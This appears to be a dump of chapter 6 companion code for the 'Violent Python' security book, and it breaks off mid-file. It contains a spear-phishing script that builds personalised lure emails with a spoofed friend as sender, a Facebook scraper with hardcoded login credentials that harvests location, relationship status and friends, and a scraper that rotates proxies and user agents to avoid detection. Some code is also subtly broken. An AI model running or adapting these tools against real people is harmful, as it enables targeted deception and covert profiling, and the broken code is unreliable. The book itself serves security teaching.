nPkt=Dot11(subtype=subtype,type=Type,proto=proto,FCfield=FCfield,ID=ID,addr1=addr1,addr2=addr2,addr3=addr3,SC=SC,addr4=addr4) 25 | return nPkt 26 | 27 | def dupSNAP(pkt): 28 | sPkt=pkt.getlayer(SNAP) 29 | oui=sPkt.OUI 30 | code=sPkt.code 31 | nPkt=SNAP(OUI=oui,code=code) 32 | return nPkt 33 | 34 | def dupLLC(pkt): 35 | lPkt=pkt.getlayer(LLC) 36 | dsap=lPkt.dsap 37 | ssap=lPkt.ssap 38 | ctrl=lPkt.ctrl 39 | nPkt=LLC(dsap=dsap,ssap=ssap,ctrl=ctrl) 40 | return nPkt 41 | 42 | def dupIP(pkt): 43 | iPkt=pkt.getlayer(IP) 44 | version=iPkt.version 45 | tos=iPkt.tos 46 | ID=iPkt.id 47 | flags=iPkt.flags 48 | ttl=iPkt.ttl 49 | proto=iPkt.proto 50 | src=iPkt.src 51 | dst=iPkt.dst 52 | options=iPkt.options 53 | 
nPkt=IP(version=version,id=ID,tos=tos,flags=flags,ttl=ttl,proto=proto,src=src,dst=dst,options=options) 54 | return nPkt 55 | 56 | def dupUDP(pkt): 57 | uPkt=pkt.getlayer(UDP) 58 | sport=uPkt.sport 59 | dport=uPkt.dport 60 | nPkt=UDP(sport=sport,dport=dport) 61 | return nPkt 62 | 63 | -------------------------------------------------------------------------------- /CH6/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.DS_Store -------------------------------------------------------------------------------- /CH6/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | book_scripts 4 | 5 | 6 | 7 | 8 | 9 | org.python.pydev.PyDevBuilder 10 | 11 | 12 | 13 | 14 | 15 | org.python.pydev.pythonNature 16 | 17 | 18 | -------------------------------------------------------------------------------- /CH6/.pydevproject: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Default 6 | python 2.7 7 | 8 | -------------------------------------------------------------------------------- /CH6/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 2 5 | svn://192.168.1.100/code_repo/book_scripts 6 | svn://192.168.1.100/code_repo 7 | 8 | 9 | 10 | 2012-01-13T00:46:35.653694Z 11 | 2 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 02d88a86-f816-4d4a-8b85-92750d4e3223 28 | 29 | web_common.pyc 30 | file 31 | 3 32 | 33 | 34 | 35 | 2012-01-15T19:47:29.189829Z 36 | 5c09afcc1c82c9cae1331ef4665153db 37 | 2012-01-15T21:34:36.879321Z 38 | 3 39 | 40 | has-props 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 1290 62 | 63 | anon_scrape.py 64 | file 65 | 3 66 | 67 | 68 | 69 | 2012-01-16T03:58:18.000000Z 70 | 52abc7b0645ae5b2eff6d237d50db4fa 71 | 2012-01-15T21:34:36.879321Z 72 | 3 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 4403 96 | 97 | twitter_locate.py 98 | file 99 | 3 100 | 101 | 102 | 103 | 2012-01-15T20:48:51.000000Z 104 | 27ea515dcfe9e2405f8818d967fc11d9 105 | 2012-01-15T21:34:36.879321Z 106 | 3 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 712 130 | 131 | violent_email.pyc 132 | file 133 | 7 134 | 135 | 136 | 137 | 2012-01-23T02:27:12.000000Z 138 | a817e7e730e63478a32d49e837426bca 139 | 2012-01-25T02:33:22.614031Z 140 | 7 141 | 142 | has-props 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 1169 164 | 165 | .project 166 | file 167 | 168 | 169 | 170 | 171 | 2012-01-11T02:00:22.000000Z 172 | f35f223d68c00afce8aa5d09217b04cc 173 | 2012-01-13T00:46:35.653694Z 174 | 2 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 366 198 | 199 | twitter.py 200 | file 201 | 9 202 | 203 | 204 | 205 | 2012-02-17T16:30:14.000000Z 206 | 61d9e71186d92cbb89bed29ecd2967b8 207 | 2012-02-17T17:04:16.640470Z 208 | 9 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 1019 232 | 233 | twitter_interests.py 234 | file 235 | 3 236 | 237 | 
238 | 239 | 2012-01-15T21:30:41.000000Z 240 | 4b70a2a7d38b2dcd3724ad2a04cbbb02 241 | 2012-01-15T21:34:36.879321Z 242 | 3 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 1218 266 | 267 | parse_webpage.py 268 | file 269 | 4 270 | 271 | 272 | 273 | 2012-01-16T18:16:58.000000Z 274 | 0d412fdfcf9929d54c4cc74ab76c95a9 275 | 2012-01-19T02:51:19.072734Z 276 | 4 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 355 300 | 301 | twitter.pyc 302 | file 303 | 3 304 | 305 | 306 | 307 | 2012-01-15T20:51:23.000000Z 308 | 0c6286675eb89238cb6a2edb4257952d 309 | 2012-01-15T21:34:36.879321Z 310 | 3 311 | 312 | has-props 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 1018 334 | 335 | basic_usage.py 336 | file 337 | 3 338 | 339 | 340 | 341 | 2012-01-13T00:58:35.000000Z 342 | ff17357f5da0ac0ae52bf5560e93ea0c 343 | 2012-01-15T21:34:36.879321Z 344 | 3 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 346 368 | 369 | .pydevproject 370 | file 371 | 372 | 373 | 374 | 375 | 2012-01-11T02:00:22.000000Z 376 | a612188e29a89bcb72e119d50c0e27e4 377 | 2012-01-13T00:46:35.653694Z 378 | 2 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 304 402 | 403 | create_browser.py 404 | file 405 | 3 406 | 407 | 408 | 409 | 2012-01-13T21:01:23.000000Z 410 | eab6f751e3149d6ef944d6a80f696bdb 411 | 2012-01-15T21:34:36.879321Z 412 | 3 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 780 436 | 437 | violent_person.py 438 | file 439 | 9 440 | 441 | 442 | 443 | 2012-02-17T16:37:16.000000Z 444 | ef40896f710d6828142cffd049404607 445 | 2012-02-17T17:04:16.640470Z 446 | 9 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 3867 470 | 471 | phishing.py 472 | file 473 | 7 474 | 475 | 476 | 477 | 2012-01-23T02:55:21.000000Z 478 | d5ef9aaffb5ab26868d94c7038b0d3ad 479 | 2012-01-25T02:33:22.614031Z 480 | 7 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 2309 504 | 505 | facebook.py 506 | file 507 | 9 508 | 509 | 510 | 511 | 2012-02-17T16:44:26.000000Z 512 | b0eeb7af2b1281c36d3fba4686dab10b 513 | 2012-02-17T17:04:16.640470Z 514 | 9 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 1811 538 | 539 | violent_person.pyc 540 | file 541 | 7 542 | 543 | 544 | 545 | 2012-01-23T02:27:12.000000Z 546 | 3abfeed5e4128130f9ff48d3d9e7dc94 547 | 2012-01-25T02:33:22.614031Z 548 | 7 549 | 550 | has-props 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 3865 572 | 573 | urlopen_wget.py 574 | file 575 | 3 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | deleted 596 | 597 | google.py 598 | file 599 | 9 600 | 601 | 602 | 603 | 2012-02-17T16:08:25.000000Z 604 | 95605be850e62690fdf9c9164bb9ac3b 605 | 2012-02-17T17:04:16.640470Z 606 | 9 607 | 608 | 609 | 610 | 611 
| 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 902 630 | 631 | quarkbase.py 632 | file 633 | 9 634 | 635 | 636 | 637 | 2012-02-17T16:36:43.000000Z 638 | ade0d21dbe2f81432cf9665c4c1902fa 639 | 2012-02-17T17:04:16.640470Z 640 | 9 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 1760 664 | 665 | test.py 666 | file 667 | 5 668 | 669 | 670 | 671 | 2012-01-16T21:47:24.000000Z 672 | 215a997111a595751960d8f2f7154221 673 | 2012-01-21T18:08:31.520353Z 674 | 5 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 237 698 | 699 | temp.html 700 | file 701 | 5 702 | 703 | 704 | 705 | 2012-01-21T17:05:38.064753Z 706 | 420fec360a1ea4e779790f182bb4f3d4 707 | 2012-01-21T18:08:31.520353Z 708 | 5 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 19721 732 | 733 | violent_browser.py 734 | file 735 | 6 736 | 737 | 738 | 739 | 2012-01-21T21:18:59.000000Z 740 | 8232f2962940fea04c86c24b11d5df1a 741 | 2012-01-22T23:19:49.427256Z 742 | 6 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 1574 766 | 767 | web_common.py 768 | file 769 | 3 770 | 771 | 772 | 773 | 2012-01-15T19:47:23.205805Z 774 | b3caddbad041a94afa7dddfa0e982332 775 | 2012-01-15T21:34:36.879321Z 776 | 3 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 1315 800 | 801 | simple_scrape.py 802 | file 803 | 9 804 | 805 | 806 | 807 | 2012-02-17T15:57:44.000000Z 808 | be4c2ff462b206f4cb28557d8a554add 809 | 2012-02-17T17:04:16.640470Z 810 | 9 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 825 | 826 | 827 | 828 | 829 | 830 | 831 | 832 | 833 | 2931 834 | 835 | violent_browser.pyc 836 | file 837 | 6 838 | 839 | 840 | 841 | 2012-01-21T21:20:13.000000Z 842 | 9feea90b28cf0de71b0c7e52bd45dc26 843 | 2012-01-22T23:19:49.427256Z 844 | 6 845 | 846 | has-props 847 | 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | 857 | 858 | 859 | 860 | 861 | 862 | 863 | 864 | 865 | 866 | 867 | 2371 868 | 869 | violent_email.py 870 | file 871 | 7 872 | 873 | 874 | 875 | 2012-01-23T02:06:21.000000Z 876 | 70c5db2fa0abf2ed4a93e2bb56951c4f 877 | 2012-01-25T02:33:22.614031Z 878 | 7 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 700 902 | 903 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/twitter.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_browser.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_email.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 
5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/violent_person.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/prop-base/web_common.pyc.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/.project.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | book_scripts 4 | 5 | 6 | 7 | 8 | 9 | org.python.pydev.PyDevBuilder 10 | 11 | 12 | 13 | 14 | 15 | org.python.pydev.pythonNature 16 | 17 | 18 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/.pydevproject.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Default 6 | python 2.7 7 | 8 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/anon_scrape.py.svn-base: -------------------------------------------------------------------------------- 1 | '''import mechanize, cookielib, urlparse, os, re, random, time 2 | 3 | def create_browser(): 4 | #Create the basic browser object 5 | browser = mechanize.Browser() 6 | #Create a handler for cookies, this class can load and save cookies 7 | cj = cookielib.LWPCookieJar() 8 | #Add it to browser 9 | browser.set_cookiejar(cj) 10 | #Ignore robots.txt, so we don't miss anything while scraping 11 | browser.set_handle_robots(False) 12 | #Allow refresh redirections 13 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 14 | #Add a user agent header to our browser 15 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 16 | 'Windows NT 6.1; Trident/5.0)'))] 17 | return browser 18 | ''' 19 | class Violent_Scraper(): 20 | def __init__(self, browser = None, mirror_dir = None, proxies = [], user_agents = []): 21 | #If browser is passed in, use that, otherwise make a new one 22 | self.browser = browser if browser else create_browser() 23 | self.dir = mirror_dir if mirror_dir else '' 24 | self.proxies = proxies 25 | self.user_agents = user_agents + ['Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 26 | 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)', 27 | 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.5004; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 28 | 'Mozilla/5.0 (X11; U; Linux; de-DE) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0', 29 | 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Avant Browser; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)', 30 | 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.2.14pre) Gecko/20101212 Camino/2.1a1pre (like Firefox/3.6.14pre)', 31 | 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba 
UNTRUSTED/1.0', 32 | 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko, Safari) Cheshire/1.0.UNOFFICIAL', 33 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13', 34 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'] 35 | 36 | def anonymize(self): 37 | #If not using a proxy, do nothing 38 | if self.proxies: 39 | #Random number between 0 and the length of self.proxies 40 | index = random.randrange(0, len(self.proxies) ) 41 | #Set self.browser's proxy to the randomly chosen proxy 42 | self.browser.set_proxy( {'http': self.proxies[index]} ) 43 | 44 | #Randomly choose a new user agent string 45 | index = random.randrange(0, len(self.user_agents)) 46 | self.browser.addheaders = self.user_agents[index] 47 | 48 | #Clear cookies 49 | cj = cookielib.LWPCookieJar() 50 | browser.set_cookiejar(cj) 51 | 52 | time.sleep(60) 53 | ''' 54 | def save_page(self, html, dst): 55 | dst = dst.lstrip('http://') 56 | f = open(dst, 'w') 57 | f.write(html) 58 | f.close() 59 | 60 | def scrape(self, website, visited = []): 61 | self.anonymize() 62 | 63 | #Get the hostname of the website 64 | hostname = urlparse.urlparse(website).hostname 65 | 66 | save_file_path = os.path.join(self.dir, website+'.html') 67 | source = self.browser.open(website).read() 68 | self.save_page(source, save_file_path) 69 | 70 | #Mechanize method that can except a regex 71 | #We pass in hostname so we don't get sent outside the site 72 | for link in self.browser.links(url_regex = hostname): 73 | if link not in visited: 74 | #Scrae the page, and add to visited 75 | visited += self.scrape(link, visited) 76 | 77 | #Return visited for trackign purposes 78 | return visited 79 | 80 | v = Violent_Scraper() 81 | v.scrape('http://www.espn.com')''' -------------------------------------------------------------------------------- /CH6/.svn/text-base/basic_usage.py.svn-base: -------------------------------------------------------------------------------- 1 | import urllib2, mechanize 2 | 3 | #Open the page 4 | page = urllib2.urlopen('violentpython.org') 5 | #source_code will be a list of strings containing the lines of source code 6 | source_code = page.read() 7 | 8 | #Create a browser object 9 | browser = mechanize.Browser() 10 | #Open the page 11 | page = browser.open('violentpython.org') 12 | #View the source code 13 | source_code = page.read() -------------------------------------------------------------------------------- /CH6/.svn/text-base/create_browser.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, urlparse, os 2 | 3 | def create_browser(): 4 | #Create the basic browser object 5 | browser = mechanize.Browser() 6 | #Create a handler for cookies, this class can load and save cookies 7 | cj = cookielib.LWPCookieJar() 8 | #Add it to browser 9 | browser.set_cookiejar(cj) 10 | #Ignore robots.txt, so we don't miss anything while scraping 11 | browser.set_handle_robots(False) 12 | #Allow refresh redirections 13 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 14 | #Add a user agent header to our browser 15 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 16 | 'Windows NT 6.1; Trident/5.0)'))] 17 | return browser -------------------------------------------------------------------------------- /CH6/.svn/text-base/facebook.py.svn-base: -------------------------------------------------------------------------------- 1 | from 
violent_browser import Violent_Browser 2 | from BeautifulSoup import BeautifulSoup 3 | import re 4 | 5 | class Facebook(): 6 | def __init__(self, user_name, password): 7 | self._browser = self.login(user_name, password) 8 | pass 9 | 10 | def login(self, user_name, password): 11 | browser = Violent_Browser() 12 | browser.open('http://www.facebook.com') 13 | 14 | #The first form is the login form 15 | browser.select_form(nr = 0) 16 | 17 | #Add our login details 18 | browser.form['email']= user_name 19 | browser.form['pass']= password 20 | 21 | #Submit login 22 | browser.submit() 23 | #Return the browser that is now logged in for use 24 | return browser 25 | 26 | def get_information(self): 27 | profile_page = self._browser.find_link(url_regex="profile") 28 | page = self._browser.follow_link(profile_page).read() 29 | 30 | #Lives in follows pattern ["Lives in"][gibberish][link][Name of city][closing of link] 31 | lives_in = re.compile('Lives in .*?">(.*?)').findall(page) 32 | #If found, use that location, else use error string 33 | self.lives_in = lives_in[0] if lives_in else 'Location not listed' 34 | 35 | #Check if in a relationship 36 | relationship_status_regex = re.compile('In a relationship').search(page) 37 | self.status = True if relationship_status_regex else False 38 | 39 | friends = {} 40 | #Find friends 41 | friends_on_page = re.compile('alt="(.*?)"').findall(page) 42 | for friend in friends_on_page: 43 | if not friends.has_key(friend): 44 | friends[friend] = True 45 | del friends[''] 46 | self.friends = friends.keys() 47 | 48 | fb = Facebook('insanepyro07@yahoo.com', 'fr0$7yfacebookp@$$w0rd') 49 | fb.get_information() 50 | print fb.lives_in 51 | print fb.status 52 | print fb.friends -------------------------------------------------------------------------------- /CH6/.svn/text-base/google.py.svn-base: -------------------------------------------------------------------------------- 1 | from violent_browser import Violent_Browser 2 | import json, urllib 3 | 4 | class Google_Result(): 5 | def __init__(self, title, text, url): 6 | self.title = title 7 | self.text = text 8 | self.url = url 9 | 10 | #Will print the title of the result if someone calls print on the class 11 | def __repr__(self): 12 | return self.title 13 | 14 | def google(search_term): 15 | vb = Violent_Browser() 16 | 17 | search_term = urllib.quote_plus(search_term) 18 | response = vb.open('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + search_term) 19 | 20 | objects = json.load(response) 21 | 22 | results = [] 23 | 24 | for result in objects['responseData']['results']: 25 | url = result['url'] 26 | title = result['titleNoFormatting'] 27 | text = result['content'] 28 | 29 | new_gr = Google_Result(title, text, url) 30 | results.append(new_gr) 31 | 32 | return results 33 | 34 | print google('Black Cell') 35 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/parse_webpage.py.svn-base: -------------------------------------------------------------------------------- 1 | import re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | link_finder = re.compile('href="(.*?)"') 5 | links = link_finder.findall(source) 6 | for link in links: 7 | print link 8 | 9 | #Parse with beautiful soup 10 | #Create a soup 11 | soup = BeautifulSoup(source) 12 | #Get all links 13 | links = soup.findAll(name='a') 14 | for link in links: 15 | if link.has_key('href'): 16 | print link['href'] -------------------------------------------------------------------------------- 
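The parse_webpage snippet above assumes a `source` string is already in scope and contrasts a quick href regex against BeautifulSoup's parser. A self-contained variant under the same stack the repo targets (Python 2.7, BeautifulSoup 3, mechanize-era stdlib) is sketched below; the function name and demo URL are illustrative, not from the book. urlparse.urljoin turns relative hrefs into absolute URLs, which the regex one-liner would miss.

import urllib2, urlparse
from BeautifulSoup import BeautifulSoup

def get_links(url):
    # Fetch the page and parse every anchor tag out of it
    source = urllib2.urlopen(url).read()
    soup = BeautifulSoup(source)
    links = []
    for tag in soup.findAll('a'):
        if tag.has_key('href'):
            # Resolve relative hrefs against the page URL
            links.append(urlparse.urljoin(url, tag['href']))
    return links

print get_links('http://www.violentpython.org')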
/CH6/.svn/text-base/phishing.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_email, violent_person, random, re 2 | 3 | #Create an arbitrary person with our information in it 4 | person = violent_person.Violent_Person('Violent', 'Python', 'hacker', {'Twitter': 'ViolentPython'}) 5 | person.location = 'Dr Evil Island, Pacific Ocean' 6 | person.twitter_mentions = ['AggressiveExploits'] 7 | person.websites = ['http://www.secretsofinterest.com'] 8 | person.relationship = False 9 | person.friends = ['Aggressive Exploits', 'Sally Fourth'] 10 | person.links = [('Violent Pythonic Widgets Inc Loses a Trillion Dollars', 'www.awesomenewsaboutbadguys.com'), 11 | ('Violent Pythonic Widgets Inc Sues Everyone', 'www.badnewshackers.com') ] 12 | 13 | client = violent_email.Email_Client('133.713.371.337') 14 | 15 | def create_subject(person): 16 | subject = 'All of our ' 17 | if person.relationship: subject += 'committed friends ' 18 | else: subject += 'single friends ' 19 | 20 | subject += 'think this website about ' + person.job + "'s is awesome!" 21 | return subject 22 | 23 | def create_sender(person): 24 | index = random.randrange(0, len(person.friends)) 25 | name = person.friends[index] 26 | name = re.sub(' ', '_', name) 27 | name = name.lower() 28 | 29 | return name + '@legitimate_compay.com' 30 | 31 | def create_body(person): 32 | message = 'Just the other day I was browsing ' 33 | 34 | if len(person.websites) > 0: 35 | index = random.randrange(0, len(person.websites)) 36 | message += person.websites[index] + ' ' 37 | else: 38 | message += ' the amazing website you mentioned ' 39 | 40 | message += 'and I came across a recent story. It mentioned that ' 41 | 42 | if len(person.links) > 0: 43 | index = random.randrange(0, len(person.links)) 44 | message += person.links[index][0] + '. ' 45 | else: 46 | ' your company hit a rough spot recently. ' 47 | 48 | message += "What's the deal with that?!? Well, anyway I saw more information " 49 | 50 | if person.location: 51 | message += "about how it affects people in " + person.location + ' ' 52 | 53 | message += ' at this awesome resource. ' 54 | message += '.' 55 | message += 'Hope you are doing ok!' 
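    # Annotation (editor's note, not part of the original code): create_body()
    # stitches the lure together from whatever recon fields are populated on
    # the person object (websites, links, location) and falls back to generic
    # filler when a field is empty, so the message still reads naturally.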
56 | 57 | return message 58 | 59 | subject = create_subject(person) 60 | sender = create_sender(person) 61 | body = create_body(person) 62 | client.send_email('violentpython@violentpythonwidgets.com', sender, subject, body) -------------------------------------------------------------------------------- /CH6/.svn/text-base/quarkbase.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | #A basic class to store information 5 | class Person(): 6 | def __init__(self, first_name, last_name, job = '', social_media = {} ): 7 | self.first_name = first_name 8 | self.last_name = last_name 9 | self.job = job 10 | self.social_media = social_media 11 | 12 | def __repr__(self): 13 | return self.first_name + ' ' + self.last_name + ' has job ' + self.job 14 | 15 | 16 | def search_quark(page): 17 | soup = BeautifulSoup(page) 18 | soup.prettify() 19 | #All people are inside of cells with class attribute 'peopletd' 20 | people_cells = soup.findAll('td', attrs = {'class' : 'peopletd'} ) 21 | results = [] 22 | for cell in people_cells: 23 | #Find person's name using BeautifulSoup's find method 24 | name = cell.find('b').string 25 | first_name = name.split(' ')[0] 26 | last_name = name.split(' ')[1] 27 | 28 | #Find person's job using regular expression based on page formatting 29 | job = re.compile('  (.*?)\n').findall( cell.prettify() ) 30 | job = job[0] if job else "No career found" 31 | 32 | #Dictionary to hold social media information 33 | social_media = {} 34 | #Find all links 35 | for link in cell.findAll('a'): 36 | #Create new key/value pairs in dictionary, key is found using regex 37 | media_name = re.compile('">(.*?)').findall( str(link) )[0] 38 | social_media[media_name] = link['href'] 39 | 40 | results.append(new_person) 41 | new_person = Person(first_name, last_name, job, social_media) 42 | return results 43 | 44 | browser = violent_browser.Violent_Browser() 45 | #Get first page of results 46 | page = browser.open('http://www.quarkbase.com/people/' + 'espn.com').read() 47 | 48 | print search_quark(page) -------------------------------------------------------------------------------- /CH6/.svn/text-base/simple_scrape.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, urlparse, os, re 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | class Violent_Mirror(): 5 | def __init__(self, mirror_dir = None): 6 | #If browser is passed in, use that, otherwise make a new one 7 | self.browser = violent_browser.Violent_Browser() 8 | self.dir = mirror_dir if mirror_dir else '' 9 | 10 | def save_page(self, html, dst): 11 | f = open(dst, 'w') 12 | f.write(html) 13 | f.close() 14 | 15 | def rewrite_links(self, html, hostname): 16 | soup = BeautifulSoup(html) 17 | for link in soup.findAll(name='a'): 18 | #If this is an href link, and hostname is found in the link 19 | if link.has_key('href') and re.search(hostname, link['href']): 20 | #Replace '/' with '_' like we do when saving to disk 21 | link['href'] = link['href'].replace('/', '_') + '.html' 22 | #Change http:__ to file:// for a valid link 23 | link['href'] = link['href'].replace('http:__', 'file://') 24 | 25 | return soup.prettify() 26 | 27 | def get_imgs(self, html): 28 | soup = BeautifulSoup(html) 29 | #Find all 'img' html tags 30 | image_tags = soup.findAll('img') 31 | 32 | for image in image_tags: 33 | #Create the filename 34 | filename = 
image['src'].lstrip('http://') 35 | filename = os.path.join(self.dir, filename.replace('/', '_')) 36 | 37 | data = self.browser.open(image['src']).read() 38 | 39 | save = open(filename, 'wb') 40 | save.write(data) 41 | save.close() 42 | 43 | image['src'] = 'file://' + filename 44 | return soup.prettify() 45 | 46 | def mirror(self, website, visited = []): 47 | #Get the hostname of the website 48 | hostname = urlparse.urlparse(website).hostname 49 | filename = website.lstrip('http://') 50 | filename = filename.replace('/', '_') + '.html' 51 | 52 | save_file_path = os.path.join(self.dir, filename) 53 | response = self.browser.open(website) 54 | source = response.read() 55 | 56 | #Rewrite the links in source 57 | source = self.rewrite_links(source, hostname) 58 | source = self.get_imgs(source) 59 | 60 | self.save_page(source, save_file_path) 61 | 62 | #Return to page after viewing images 63 | self.browser.open(website) 64 | 65 | #Mechanize method that can except a regex 66 | #We pass in hostname so we don't get sent outside the site 67 | try: 68 | for link in self.browser.links(url_regex = hostname): 69 | if link.url not in visited: 70 